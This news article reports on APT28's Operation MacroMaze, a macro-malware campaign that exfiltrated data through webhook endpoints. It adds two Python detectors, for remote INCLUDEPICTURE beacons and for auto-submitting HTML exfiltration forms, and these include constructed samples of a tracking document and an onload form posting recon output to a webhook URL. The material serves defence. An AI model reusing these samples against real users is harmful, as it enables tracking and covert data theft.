Operation MacroMaze: APT28 exploits webhooks for covert data exfiltration

Operation MacroMaze: APT28 exploits webhooks for covert data exfiltration

Pierluigi Paganini February 24, 2026

Russia-linked APT28 targeted European entities with a webhook-based macro malware campaign called Operation MacroMaze.

Russia-linked APT28 (aka UAC-0001, Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) launched Operation MacroMaze, targeting select entities in Western and Central Europe from September 2025 to January 2026. The campaign used webhook-based macro malware, leveraging simple tools and legitimate services for infrastructure and data exfiltration.

The attack chain begins with spear-phishing emails delivering weaponized documents that contain an “INCLUDEPICTURE” field pointing to a webhook[.]site URL hosting a JPG.

“All analyzed documents share a common structural element within their XML: an INCLUDEPICTURE field referencing a remote URL hosted on webhook[.]site.” reads the report published by S2 Grupo’s LAB52 threat intelligence team. “This field is embedded in the document’s XML (w:instrText) and instructs Microsoft Word to retrieve an external image resource when the field is evaluated. The referenced file (docopened.jpg) is fetched from the remote server when the document is opened and fields are updated. This behavior functions as a tracking mechanism: when the document is opened and Word processes the INCLUDEPICTURE field, an outbound HTTP request is generated to the remote server. The server operator can then log metadata associated with the request, effectively confirming that the document has been opened.”

When opened, the file silently retrieves the image, acting like a tracking pixel that alerts attackers the document was viewed. Variants seen between September 2025 and January 2026 use modified macros to drop malware and deploy additional payloads on compromised systems.
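A defender can triage incoming documents for this beacon without opening them in Word: a .docx is a zip of OOXML parts, and the field instruction lives in `w:instrText` runs (often split across several runs) or in a `w:fldSimple` attribute. The following script is an added example, not code from the article or from LAB52; it builds a constructed sample document in memory and scans it for INCLUDEPICTURE fields whose target is a remote URL. The UUID-style path and the `SUSPICIOUS_HOSTS` list are placeholders, not indicators from the report.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# Field instruction: INCLUDEPICTURE followed by a quoted or bare target, e.g.
#   INCLUDEPICTURE "https://host/path/docopened.jpg" \d
INCLUDEPICTURE_RE = re.compile(r'INCLUDEPICTURE\s+"?([^"\s]+)"?', re.IGNORECASE)

# Hosts the report names for tracking/C2; extend with your own watchlist (assumption).
SUSPICIOUS_HOSTS = {"webhook.site"}


def extract_field_codes(part_xml: bytes) -> list[str]:
    """Return every complete field instruction in one OOXML part.

    Complex fields are delimited by <w:fldChar w:fldCharType="begin"/> ... "end"
    with the instruction spread over one or more <w:instrText> runs; simple
    fields carry it in <w:fldSimple w:instr="...">. Both forms are collected.
    """
    root = ET.fromstring(part_xml)
    codes, buf = [], None
    for el in root.iter():
        if el.tag == W + "fldSimple":
            instr = el.get(W + "instr")
            if instr:
                codes.append(instr)
        elif el.tag == W + "fldChar":
            ftype = el.get(W + "fldCharType")
            if ftype == "begin":
                buf = []
            elif ftype == "end" and buf is not None:
                codes.append("".join(buf))
                buf = None
        elif el.tag == W + "instrText" and buf is not None:
            buf.append(el.text or "")
    return codes


def find_remote_includepicture(docx_bytes: bytes) -> list[dict]:
    """Scan a .docx for INCLUDEPICTURE fields pointing at http(s) URLs."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        # Fields can also sit in headers/footers, so scan every XML part under word/.
        parts = [n for n in zf.namelist() if n.startswith("word/") and n.endswith(".xml")]
        for part in parts:
            for code in extract_field_codes(zf.read(part)):
                m = INCLUDEPICTURE_RE.search(code)
                if not m:
                    continue
                target = m.group(1)
                if not target.lower().startswith(("http://", "https://")):
                    continue  # local picture include, not a beacon
                host = (urlparse(target).hostname or "").lower()
                findings.append({
                    "part": part,
                    "url": target,
                    "host": host,
                    "known_tracking_host": host in SUSPICIOUS_HOSTS,
                })
    return findings


def build_sample_docx(url: str) -> bytes:
    """Constructed minimal .docx with a complex INCLUDEPICTURE field split across
    two instrText runs, the way Word commonly serialises it. Test data only."""
    document_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="{W_NS}"><w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE </w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">"{url}" \\d </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>"""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/></Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder path; the real campaign used webhook[.]site URLs ending in docopened.jpg.
    sample = build_sample_docx(
        "https://webhook.site/00000000-0000-0000-0000-000000000000/docopened.jpg")
    for hit in find_remote_includepicture(sample):
        print(hit)
```

Run the script as a mail-gateway or sandbox pre-check; any hit with a remote host is worth quarantining, and a hit on a known webhook or request-bin service is a strong signal because legitimate documents have no reason to pull images from such endpoints. Note that the scan is static and does not evaluate the field, so it never triggers the beacon itself.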

Researchers identified four closely related macro variants acting as droppers. Each drops six files (VBS, BAT, CMD, HTM, XHTML) into the %USERPROFILE% folder using GUID-like names tied to a webhook[.]site C2 path. The attackers used heavy string concatenation to hide key commands. The macro launches a VBScript that triggers multi-stage execution, creates a Scheduled Task for persistence, then deletes traces. Over time, the variants evolved from simple document cleanup to fake Word error messages and SendKeys-based UI manipulation to bypass security prompts. Two batch versions follow: one uses Edge in headless mode for stealth, the other hides the browser off-screen and forcefully kills processes for reliability, suppressing certificate errors.

“The final HTML file is constructed by concatenating a static HTM file, the captured output of the reconstructed CMD payload, and a closing XHTML template. The initial HTM file defines an auto-submitting form that sends a POST request to a webhook[.]site endpoint, while the payload output is embedded directly within a element. The closing XHTML fragment completes the document structure.” continues the report. “When the resulting HTML file is rendered by Microsoft Edge, the form is submitted, causing the collected command output to be exfiltrated to the remote webhook endpoint without user interaction.”

The Operation MacroMaze campaign uses a browser-based exfiltration method that relies on standard HTML features to send stolen data while leaving minimal traces on disk. Although the specific command file used to gather system data was not recovered, similar operations previously attributed to APT28 by CERT Polska and the Computer Emergency Response Team of Ukraine suggest this stage likely deploys a lightweight reconnaissance script, collecting basic host details such as IP address, directory listings, and system environment information before exfiltration.
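Because the exfiltration stage is just a locally written HTML file that the browser submits on load, the file itself is the artifact to hunt for in user profiles. The following is an added example, not the report's or the article's code: a small scanner that parses an HTML file, records every POST form target, checks for auto-submission (an `on*` handler or inline script calling `submit()`), and measures how much text is embedded in a `<pre>` or `<textarea>` element. The report does not name the element that carries the command output, so treating `<pre>`/`<textarea>` as the carrier is an assumption; the sample HTML, its UUID path and the `EXFIL_HOSTS` set are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts named in the report as the webhook endpoint; extend with your own list (assumption).
EXFIL_HOSTS = {"webhook.site"}


class _FormScanner(HTMLParser):
    """Collects forms, auto-submit indicators and embedded payload size."""

    def __init__(self):
        super().__init__()
        self.forms = []            # list of (method, action)
        self.auto_submit = False   # onload/inline script that calls submit()
        self.embedded_chars = 0    # text inside <pre>/<textarea>: the carried output
        self._in_payload = False
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append(((a.get("method") or "get").lower(), a.get("action") or ""))
        # Any event handler attribute that submits a form counts as auto-submission.
        if any(k.startswith("on") and "submit(" in v for k, v in attrs if v):
            self.auto_submit = True
        if tag in ("pre", "textarea"):
            self._in_payload = True
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag in ("pre", "textarea"):
            self._in_payload = False
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and "submit(" in data:
            self.auto_submit = True
        if self._in_payload:
            self.embedded_chars += len(data.strip())


def assess_html_exfil(html_text: str) -> dict:
    """Return a verdict dictionary for one HTML file found on disk."""
    p = _FormScanner()
    p.feed(html_text)
    p.close()
    post_forms = [(m, act) for m, act in p.forms if m == "post"]
    hosts = set()
    for _, act in post_forms:
        h = urlparse(act).hostname
        if h:
            hosts.add(h.lower())
    return {
        "post_forms": len(post_forms),
        "targets": sorted(hosts),
        "auto_submit": p.auto_submit,
        "embedded_payload_chars": p.embedded_chars,
        # Verdict: a POST form to a known webhook host that fires without user interaction.
        "suspicious": bool(post_forms) and p.auto_submit and bool(hosts & EXFIL_HOSTS),
    }


# Constructed sample mirroring the described structure: auto-submitting POST form,
# command output embedded in the page. Values are placeholders, not campaign IoCs.
SAMPLE_EXFIL = """<html><body onload="document.forms[0].submit()">
<form method="POST" action="https://webhook.site/00000000-0000-0000-0000-000000000000">
<textarea name="output">
[constructed recon output]
HOSTNAME=WS-01
USERNAME=user
</textarea>
</form>
</body></html>"""

# Constructed benign page: a normal login form that needs a user click.
SAMPLE_BENIGN = """<html><body>
<form method="post" action="/login"><input name="u"><input type="submit"></form>
</body></html>"""


if __name__ == "__main__":
    print(assess_html_exfil(SAMPLE_EXFIL))
    print(assess_html_exfil(SAMPLE_BENIGN))
```

In a hunt, point `assess_html_exfil` at every `.htm`/`.html`/`.xhtml` file in `%USERPROFILE%` (the drop location the report describes) and alert on `suspicious`; pairing that with process telemetry showing Edge launched headless or off-screen by a scheduled task gives a much tighter detection than either signal alone.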

“This campaign proves that simplicity can be powerful. The attacker uses very basic tools (batch files, tiny VBS launchers and simple HTML) but arranges them with care to maximise stealth.” concludes the report. “The tooling may be unsophisticated, but the operational tradeoffs are effective. It’s low-tech executed with high craft, which makes detection and attribution harder than the artifacts alone would suggest.”

The APT28 group has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 Presidential election.

The group operates out of military unit 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).

In January 2026, Zscaler ThreatLabz uncovered the campaign Operation Neusploit targeting Central and Eastern Europe. The threat actors exploited the vulnerability CVE-2026-21509 and used weaponized RTF files and localized lures to deploy MiniDoor, PixyNetLoader, and Covenant Grunt implants.





Source: https://securityaffairs.com/188421/apt/operation-macromaze-apt28-exploits-webhooks-for-covert-data-exfiltration.html